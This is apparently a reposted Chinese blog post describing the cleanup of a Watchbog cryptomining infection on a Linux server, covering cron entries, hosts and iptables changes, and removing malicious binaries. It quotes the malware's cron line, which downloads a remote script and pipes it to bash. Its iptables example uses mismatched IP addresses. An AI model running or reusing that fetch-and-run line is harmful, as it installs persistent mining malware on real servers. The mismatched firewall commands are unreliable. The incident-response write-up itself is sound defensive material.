服务器挖矿是什么意思,服务器被攻击挖矿怎么解决!

最近比较忙,更新的文章也少了一些,但是今天看到服务器挖矿是什么意思,服务器被攻击挖矿怎么解决!,觉得非常棒,所以第一时间分享给各位,仔细阅读相信一定会有所收获。

最近运气不太好,居然有台服务器被挖矿了,下面记录下问题发生的过程和解决方法,仅供参考。


一、Watchbog挖矿病毒

1、服务器收到cpu报警,cpu被占用达到100%,登录服务器查看,发现cpu被一个watchbog的进程占满了,如下图所示:

服务器被挖矿了?用这个思路可以彻底解决

2、杀掉会话

发现用kill杀掉后,这个进程还是会隔一会自动起来,很明显被加入了定时任务,检查所示:

*/9 * * * * (curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O- https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||python -c 'import urllib2 as fbi;print fbi.urlopen("ht
tps://github.com/luckysBoys/lucks/blob/master/5.sh").read()'||curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||curl -fsSLk https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh -m 90||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh --no-check-certificate -t 2 -T 60)|bash

服务器被挖矿了?用这个思路可以彻底解决

打开这个URL,发现像是一堆base64的密文,密文地址。

3、当清除掉定时任务的内容之后,隔了一会,其又被加入了如上一模一样的内容,所以该病毒程序不是一般的病毒程序。

4、经过后来的了解,发现该进程watchbog为被植入的挖矿程序,该程序会在cron下面写入脚本,定期去pastebin.com下载木马开始挖矿,如果删除不彻底仍然会不定期启动这个挖矿程序。


二、解决过程

1、 修改/etc/hosts

通过观察定时任务内容,可以发现几个恶意网址,分别如下:

1)raw.githubusercontent.com
2)github.com

先将上述这些地址重定向到本地

服务器被挖矿了?用这个思路可以彻底解决

2、防火墙控制出入流量

将上述被攻击者携带的域名所对应的的ip地址进行ip限制。

--比如raw.githubusercontent.com对应的ip为10.20.208.21
iptables -A INPUT -s 10.20.209.21 -j DROP
iptables -A OUTPUT -s 10.20.209.21 -j DROP
iptables -A OUTPUT -j DROP -d 10.20.209.2
--保存修改内容
/sbin/service iptables save

3、移除curl get脚本

因为该挖矿程序会借助curl、wget命令去下载病毒,所以第一时间我们需要进行如下操作:

mv /usr/bin/curl /usr/bin/lruc
mv /usr/bin/wget /usr/bin/tegw

如果确认病毒彻底被删除,我们可以不需要操作。

4、 删掉cron里面的相关任务

crontab -l 
/etc/cron.d
/etc/cron.deny
/etc/cron.monthly
/etc/cron.daily
/etc/cron.hourly
/etc/crontab
/etc/cron.weekly

上述8个与cron相关的文件目录我们都需要仔细检查一遍,凡是有关不知名的域名等信息都要彻底删除。

1) crontab -l

服务器被挖矿了?用这个思路可以彻底解决

2)/etc/cron.d

该目录下新增了好几个命令:appache、root、system

服务器被挖矿了?用这个思路可以彻底解决

3)/etc/cron.deny

服务器被挖矿了?用这个思路可以彻底解决

没有发现

4)/etc/cron.monthly

服务器被挖矿了?用这个思路可以彻底解决

5)/etc/cron.daily

服务器被挖矿了?用这个思路可以彻底解决

6)/etc/cron.hourly

服务器被挖矿了?用这个思路可以彻底解决

7)/etc/crontab

在crontab文件中还发现了新的潜藏命令httpntp、ftpdns

服务器被挖矿了?用这个思路可以彻底解决

8)/etc/cron.weekly

服务器被挖矿了?用这个思路可以彻底解决

没有发现

最后在用find过滤一遍,确保完全清除干净。

5、 删除恶意命令

同时我们还发现了恶意命令/bin/httpntp、/bin/ftpsdns、/usr/bin/watchbog

服务器被挖矿了?用这个思路可以彻底解决服务器被挖矿了?用这个思路可以彻底解决

之所以看到这些恶意命令,是从定时任务日志(/var/log/cron)中发现的。

服务器被挖矿了?用这个思路可以彻底解决

6、 删除tmp目录下timesyncc.service文件

文件详情如下:

服务器被挖矿了?用这个思路可以彻底解决

7、杀掉watchbog进程

ps -ef|grep watchbog|awk '{print $2}'|xargs kill -9

总结

面对挖矿进程我简单总结了以下几点,如果遇到挖矿进程处理先后顺序如下:

1)查看定时任务,找到挖矿程序在执行的内容。

2)将恶意网址的hosts全部重定向到本地(127.0.0.1)

3)仔细查看审核与定时任务有关的文件和目录,进行清除

4)删除恶意的命令与包,重命名系统中被利用的命令

5)杀掉对应恶意进程(为什么放到最后呢?因为就算最早杀掉,其还是会因为定时任务等等自动启动)

以上就是色彩生活网为各位整理的文章所有内容,希望对刚学习朋友有一定的帮助,如果你看完了还没有懂,或许对于新手来说也是正常的,实在不行给我评论我来给你解答疑惑。每天为朋友们收集一些好的内容,让你学习更多的知识!

暂无评论

发表评论

您的电子邮件地址不会被公开,必填项已用*标注。

相关推荐

在线营销推广怎么做,盘点广告促销对销售的意义

数汇资讯 在目前竞争激烈的市场中,想要在营销活动方面取得成功,就必须跳出固有的思维模式。 近年来,对于所有类型的公司来说,如果想要创建品牌认知度,或者是创造线上销售机会,那么在线营销就必不可少。从金融到医疗保健,公司使用着各种营销服务(广告网络、社交平台等等)与目标客户沟通。一些活动及其相关数据是内部管理,其他由代理商负责,有时甚至是多个代理。 问题是,这么多不同的网络和营销渠道可供选择,公司经常...

2022年淘宝引流推广最靠谱的几个方法(免费推广最后一波,抓紧上车)

如果你绝对淘宝越来越难做了,我认为并不是这么回事,因为一样有越做越好的人在继续努力奋斗,熟话说,方法不对,努力白费,今天小编就来讲讲目前来讲最靠谱的几个淘宝引流方法。 抖音 在抖音上,我们随便发一个视频,都有500播放量,试问一下,这么容易就能拿到的流量,哪个平台有?可以说,目前全世界还没有这么好的平台出来,除了抖音,而抖音目前来讲大多数的产品对接的都是淘宝。 目前抖音的布局是通过视频来带货,但抖...

小本创业做什么好,月入2万的10个小生意推荐

一直以来,国家对于创业都是在加大支持力度的,这促使很多中小企业的诞生,不仅仅能够让创业者实现自身的价值,还为当地的经济带来了发展。所以创业势在必行。那么,今年小本创业做什么好?如何做? 小吃快餐 像早点店,烧烤店等就属于小本经营。只要有启动资金,就可以做个小吃摊,或者租个小小的几十平米的店铺。需要花的钱也不多,几千块钱基本就可以了。摊位选择在人流量多的地方,一天下来赚的钱也不少,但这个做之前一定要...

淘宝卖家版app叫什么,淘宝店真实收入一览

淘宝卖家必备软件 每年到了11这种电商大促销的节日的时候,各个商家都笑开了花,然而对于各个客服来说,这种节日,只有一种状态:表面笑嘻嘻,内心MMP。 到了这一天,用大作战已经不足以形容当天状况的惨烈。作为各个家店铺客服宝宝,在这一天要回复成千上万个可爱买家的咨询,光是亲,您有什么需要这句话就要回复到崩溃了。更别提回复各种千奇百怪的问题了。为了胜利完成促销节日大作战的任务,许多商家都会在节日当天加派...